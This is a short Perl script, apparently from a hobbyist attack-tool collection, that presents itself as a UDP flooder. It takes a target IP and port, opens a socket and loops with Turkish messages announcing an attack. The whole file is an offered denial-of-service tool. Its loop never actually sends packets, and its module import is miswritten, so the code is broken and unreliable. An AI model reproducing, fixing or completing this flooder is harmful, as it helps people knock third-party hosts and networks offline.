#!/usr/bin/perl
	#İyi Vuruşlar Dileriz :) 
	#Flooderv1.pl Coded By Cronfig
	#Simple UDP Flooder.
	

	use io::socket;
	

	$ARGC = @ARGV;
	

	if ($ARGC != 2) {
	

	        print("Usage: $0 IP Port \n");
	        exit(1);
	

	        }
	

	($host, $port) = @ARGV;
	

	

	$sock = IO::Socket::INET->new(
	        PeerAddr => $host,
	        PeerPort => $port,
	        Proto => "udp") || die "$! Could not create sock";
	packets:
	while (1) {
	$size = rand() * rand() * rand();
	print ("Saldiriyor ! Saldiriyi Durdurmak icin Ctrl-C\n");

} 
